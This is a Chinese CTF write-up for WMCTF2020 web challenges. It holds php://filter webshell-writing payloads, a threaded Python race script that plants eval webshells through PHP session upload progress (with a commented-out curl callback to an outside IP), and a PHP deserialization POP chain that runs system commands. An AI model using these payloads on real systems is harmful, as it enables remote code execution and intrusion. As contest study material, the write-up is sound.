WMCTF2020

Checkin1

神头鬼脸,应该是没过滤好,直接/flag就出了

图片

Checkin2

预期解还是得写shell

因为"file_put_contents中可以调⽤伪协议,⽽伪协议处理时会对过滤器urldecode⼀次",所以可以二次编码特殊字符绕,如

php://filter/write=string.%2572ot13|<?cuc cucvasb();?>|/resource=1.php 

图片

wp中还有个zlib过滤方法,但是根据wp中的payload依然不能构造shell

php://filter/zlib.deflate|string.tolower|zlib.inflate|?><?php eval($_GET[1]);?>/resource=1.php 

在这里插入图片描述
tolower配合zlib会把空格吞掉,但是有个问题是如果把空格吞了怎么写php???? 而且也会吞掉一些字符,应该是用压缩数据写入再解压吧

Make PHP Great Again-1

写sess文件到/tmp下,包含写shell,中途会有429

import requests 
import io 
import time 
import threading 
#url='http://web_checkin2.wmctf.wetolink.com/' 
url='http://no_body_knows_php_better_than_me.glzjin.wmctf.wetolink.com' 
def upload(session): 
    f = io.BytesIO(b'a' * 1024 * 50) 
    files = {'file': ('1.txt', f)} 
    while 1: 
        #files={'file':123} 
        re=session.post(url,files=files,data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_GET[0]);?>'},cookies={"PHPSESSID": "wanderer"}) 
        print(re.status_code) 
        time.sleep(0.6) 
def cmd(session): 
    params={ 
        'file':'/tmp/sess_wanderer', 
        '0':'file_put_contents(%27/tmp/wander.txt%27,%27<?php%20eval($_POST[0])?>%27);' 
    } 
    #url2="http://no_body_knows_php_better_than_me.glzjin.wmctf.wetolink.com/?file=/tmp/sess_wanderer&0=system('curl http://123.57.240.205');" 
    while 1: 
        time.sleep(0.7) 
        re2 = session.get(url,params=params) 
        print(re2.status_code) 
if __name__=="__main__": 
    event=threading.Event() 
    with requests.session() as session: 
        for i in range(1,10): 
            threading.Thread(target=upload,args=(session,)).start() 
        for i in range(1,10): 
            threading.Thread(target=cmd,args=(session,)).start() 
    event.set() 

图片

包含

图片

Webweb

代码审计

调用链:

ws.php: Agent::__destruct

mapper.php:Mapper::__call

mapper.php:Mapper::find

图片

图片

图片

<?php 
    namespace DB\SQL; 
    class Mapper 
        { 
            public function __construct() 
                { 
                    $this->adhoc=array('cat /etc/flagzaizheli'=>["expr"=>"test"]); 
                    $this->props = array('quotekey' => "system"); 
                    $this->db = $this; 
                } 
        } 
    namespace cli; 
    use DB\SQL\Mapper; 
    class WS 
        { 
            public function __construct() 
                { 
                    $this->events = new Agent(); 
                } 
        } 
    class Agent 
        { 
            public function __construct() 
                { 
                    $this->server = $this; 
                    $this->events = array("disconnect" => [new Mapper(), 'find']); 
                } 
        } 
echo urlencode(serialize(new WS())); 

flag在/etc/flagzaizheli
图片

评论

  1. tinmin
    3月前
    2020-9-02 11:42:38

    师傅有webweb题目源码可以分享一下吗

  2. w4nder 博主
    3月前
    2020-9-02 14:47:12

    应该是这个https://wwe.lanzous.com/iQiRYgaacmf

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇